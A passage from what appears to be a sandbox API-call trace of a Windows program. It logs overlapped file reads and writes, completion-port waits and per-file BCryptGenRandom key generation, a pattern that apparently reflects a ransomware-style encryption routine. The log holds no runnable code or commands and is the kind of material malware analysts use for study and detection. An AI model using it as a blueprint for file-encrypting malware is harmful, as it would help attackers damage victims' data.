lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.429] CloseHandle (hObject=0x338) returned 1 [0195.430] free (_Block=0x3d70450) [0195.430] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.441] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x79f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.471] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.478] CloseHandle (hObject=0x308) returned 1 [0195.478] free (_Block=0x3df0008) [0195.478] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.497] CloseHandle (hObject=0x338) returned 1 [0195.497] free (_Block=0x1ff1e60) [0195.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.510] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe19, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.515] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xe2a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0195.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.577] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.577] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.601] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.612] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.613] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0195.613] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.613] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0195.614] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.614] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.614] free (_Block=0x3e305b8) [0195.614] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.614] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.614] free (_Block=0x1fa91d0) [0195.614] free (_Block=0x1fa2ed8) [0195.614] free (_Block=0x1fa90b8) [0195.614] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0195.617] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.624] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.626] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0195.626] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.626] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0195.627] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.627] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.627] free (_Block=0x3e305b8) [0195.627] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.627] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.627] free (_Block=0x1fa91d0) [0195.627] free (_Block=0x1fa2ed8) [0195.627] free (_Block=0x1fa90b8) [0195.627] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.634] CloseHandle (hObject=0x308) returned 1 [0195.634] free (_Block=0x3d70450) [0195.634] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.645] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.646] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0195.646] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.646] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0195.647] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.647] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.647] free (_Block=0x3e305b8) [0195.647] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.647] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.647] free (_Block=0x1fa91d0) [0195.647] free (_Block=0x1fa2ed8) [0195.647] free (_Block=0x1fa90b8) [0195.647] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0195.649] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.660] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0195.660] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.660] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0195.661] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.661] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.661] free (_Block=0x3e305b8) [0195.661] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.661] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.661] free (_Block=0x1fa91d0) [0195.661] free (_Block=0x1fa2ed8) [0195.661] free (_Block=0x1fa90b8) [0195.661] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0195.663] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.674] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0195.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.675] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0195.675] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.675] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.675] free (_Block=0x3e305b8) [0195.675] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.675] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.676] free (_Block=0x1fa91d0) [0195.676] free (_Block=0x1fa2ed8) [0195.676] free (_Block=0x1fa90b8) [0195.676] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0195.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.112] CloseHandle (hObject=0x338) returned 1 [0196.112] free (_Block=0x1ff1e60) [0196.112] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.122] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.122] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.122] free (_Block=0x3e305b8) [0196.122] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.122] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.122] free (_Block=0x1fa91d0) [0196.122] free (_Block=0x1fa2ed8) [0196.123] free (_Block=0x1fa90b8) [0196.123] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0196.125] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.154] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.154] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.156] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.156] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.156] free (_Block=0x3e305b8) [0196.156] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.156] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0196.157] free (_Block=0x1fa91d0) [0196.157] free (_Block=0x77d7a8) [0196.157] free (_Block=0x1fa90b8) [0196.157] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0196.157] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.158] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xdf9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0196.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.169] CloseHandle (hObject=0x338) returned 1 [0196.170] free (_Block=0x3d70450) [0196.170] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.181] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.181] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.181] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.182] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.182] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.182] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.182] free (_Block=0x3e305b8) [0196.182] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.182] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.182] free (_Block=0x1fa91d0) [0196.182] free (_Block=0x1fa2ed8) [0196.182] free (_Block=0x1fa90b8) [0196.183] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.192] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.193] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.193] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.194] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.194] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.194] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.194] free (_Block=0x3e305b8) [0196.194] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.194] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.195] free (_Block=0x1fa91d0) [0196.195] free (_Block=0x1fa2ed8) [0196.195] free (_Block=0x1fa90b8) [0196.195] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0196.196] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.199] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2a240, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.199] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.200] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xfc70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0196.201] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.295] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.296] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.306] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0196.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.314] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x585a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.350] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.351] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.645] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1b40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.651] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4750, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.651] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0196.663] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.663] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0196.663] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0196.664] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.664] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.664] free (_Block=0x3e305b8) [0196.664] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.664] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.665] free (_Block=0x1fa91d0) [0196.665] free (_Block=0x1fa2ed8) [0196.665] free (_Block=0x1fa90b8) [0196.665] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: 